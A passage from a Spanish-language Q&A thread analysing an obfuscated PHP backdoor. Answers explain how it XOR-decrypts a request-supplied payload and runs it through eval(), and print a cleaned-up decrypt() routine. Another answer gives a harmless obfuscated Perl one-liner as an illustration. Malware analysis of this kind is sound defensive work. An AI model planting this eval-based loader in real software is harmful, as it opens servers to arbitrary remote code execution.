// stage that produced this code fills it in; confirm against the full file.
// The @ hides any notice decrypt() emits (it never initialises its own $d).
$d = @decrypt($d, $k);

// eval $d — runs whatever PHP the requester encrypted with their key.
// This is the backdoor proper: arbitrary code execution with no server-side
// check on the payload. With a wrong key the XOR output is garbage and eval()
// typically fails with a parse error rather than doing anything.
eval($d);

Y ahora veamos más a fondo la función decrypt(). Limpiada, queda así:

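/**
 * Repeating-key XOR used by the backdoor to unwrap its request-supplied payload.
 *
 * The input is processed in chunks of strlen($key): every full chunk is XORed
 * with the whole key (PHP's string ^ operator), and the trailing partial chunk,
 * if any, is XORed with the key truncated to the leftover length. XOR is its
 * own inverse, so the same routine both encrypts and decrypts.
 *
 * @param string|null $encrypted_string Raw bytes to transform.
 * @param string|null $key              XOR key; must be non-empty.
 * @return string|null The transformed bytes, or null when $key is falsy
 *                     (the original treats "", "0" and null alike as "no key").
 *                     Unlike the original, an empty input with a valid key
 *                     returns "" instead of an uninitialised (null) $d.
 */
function decrypt($encrypted_string, $key): ?string
{
    // Original semantics kept deliberately: any falsy key means "no key".
    if (!$key) {
        return null;
    }

    $key_len = strlen($key);
    $total_len = strlen($encrypted_string);
    $tail_len = $total_len % $key_len;   // bytes left after the last full chunk
    $full_len = $total_len - $tail_len;  // bytes covered by whole-key chunks

    // The original never initialised $d before its first .=, which emits an
    // "Undefined variable" warning (masked upstream by @). Start from ''.
    $decrypted = '';
    for ($offset = 0; $offset < $full_len; $offset += $key_len) {
        $decrypted .= substr($encrypted_string, $offset, $key_len) ^ $key;
    }

    if ($tail_len) {
        // Partial chunk: XOR against the first $tail_len bytes of the key.
        $decrypted .= substr($encrypted_string, $full_len, $tail_len) ^ substr($key, 0, $tail_len);
    }

    return $decrypted;
}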

Este es un esquema de cifrado simple basado en XOR. Se toma la clave y se compara su longitud con la del mensaje. Se recorre el mensaje en fragmentos del tamaño de la clave, aplicando XOR entre cada fragmento y la clave completa (operador ^ sobre cadenas), y se va acumulando el resultado descifrado. Si la longitud de la clave no divide exactamente a la del mensaje, el fragmento restante se combina con XOR con el comienzo de la clave, recortada a la longitud necesaria.

    
respondido por el deed02392 06.05.2014 - 18:09

Es Perl incrustado en PHP; por ejemplo, copie y pegue lo siguiente en un archivo de texto:

''=~('(?{'.('.,)./}'^'^^@@[]').'"'.('@-:}/@@]}@.@]}.@,@^'^'/@]][(%$]+@/*]^%^,|').',$/})')

$ more perltest 
''=~('(?{'.('.,)./}'^'^^@@[]').'"'.('@-:}/@@]}@.@]}.@,@^'^'/@]][(%$]+@/*]^%^,|').',$/})')

$ perl perltest 
omg they know perl
$ 

Ojalá tuviera tiempo para desofuscarlo ahora mismo; mañana volveré a ello. Pero, en esencia, hay código incrustado dentro del código.

    
respondido por el munkeyoto 01.05.2014 - 22:57
